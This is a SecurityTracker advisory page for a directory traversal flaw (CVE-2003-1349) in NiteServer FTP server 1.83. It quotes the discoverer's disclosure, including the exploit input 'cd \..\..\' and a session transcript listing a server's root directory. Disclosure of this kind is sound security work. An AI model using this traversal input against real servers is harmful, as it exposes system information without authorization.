SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   NiteServer Vendors:   Krebs, Thomas
NiteServer FTP Server Input Validation Bug Discloses Directories on the System to Remote Users
SecurityTracker Alert ID:  1005923
SecurityTracker URL:  http://securitytracker.com/id/1005923
CVE Reference:   CVE-2003-1349   (Links to External Site)
Updated:  Jun 14 2008
Original Entry Date:  Jan 15 2003
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Exploit Included:  Yes  
Version(s): 1.83
Description:   An input validation vulnerability was reported in the NiteServer FTP server. A remote authenticated user, including an anonymous user, can view arbitrary directories on the system.

Dennis Rand reported that NiteServer does not filter '\..' character strings from user-supplied commands. A remote authenticated user can view directory listings for directories on the system located outside of the FTP document directory.

A demonstration exploit command is provided:

cd \..\..\

A demonstration exploit transcript is provided in the Source Message.

[Editor's note: The report does not indicate that the remote authenticated user can view arbitrary files.]

Impact:   A remote authenticated user (including anonymous users, if permitted) can view the directory structure and directory listings on the system.
Solution:   According to the report, version 1.85 is not vulnerable.

The latest version is available at:

http://home.knuut.de/Turtie/
http://home.knuut.de/Turtie/niteserver.zip

Vendor URL:  home.knuut.de/Turtie/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Directory traversal vulnerabilities found in NITE ftp-server version 1.83


                 Directory traversal vulnerabilities found in 
			NITE ftp-server version 1.83
		                                         
                           Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY

The NiteServer is a simple FTP-Server program with some special features.
It is free and easy to use.
The following commands are recognized :
USER PORT RETR REST
PASS STOR CWD DELE 
HELP LIST
so it should work with any usual ftp-client.
Special Download-Ratio features are implemented.
User-logins are logged with their IP-Number, so the Up/Download-Ratio
will be held for the future. Spy users, watch what they are up- or downloading.
Are you interested in learning Visual Basic Internet programming ? 
Do you need some different features ?
You can purchase the source-code (VB 6.0) from the Author.
Simply send a check about 25 US-$ to

A directory traversal vulnerability in the product allows remote attackers to 
cause 
the server to traverse into directories that reside outside the bounding 
FTP root directory.

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 *  Niteserver Version:1.83 - Author:Thomas Krebs
 
Immune systems:
 * NiteServer version 1.85

NiteServer failure to filter out "\.." sequences in command requests allows 
remote users to break out of restricted directories and gain read access 
to the system directory structure; Possibility for discovering the directory
structure outside the configured areas. 


The following transcript demonstrates a sample exploitation of the 
vulnerabilities:

Connected to 192.168.1.22.
220-  Niteserver Version:1.83
220-  Author:Thomas Krebs
220-  email: turtie@knuut.de
220- Welcome to the  Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler 
til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x  1 User     Group              0 Dec 30 15:19 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Dec 24 00:08 TEMP
drwxr-xr-x  1 User     Group              0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.

Detection:
Niteserver Version:1.83 is vulnerable to the above-described attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above 
transcript. 

Vendor response:
Niteserver Version:1.83 fixes this issue. The latest version is 
available from  come.to/niteserversite


Disclosure timeline:
12/12/2002 Found the Vulnerability.
12/12/2002 Author notified (turtie@knuut.de)
01/13/2003 No Responses received from turtie@knuut.de
01/13/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix@infowarfare.dk> Dennis Rand

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC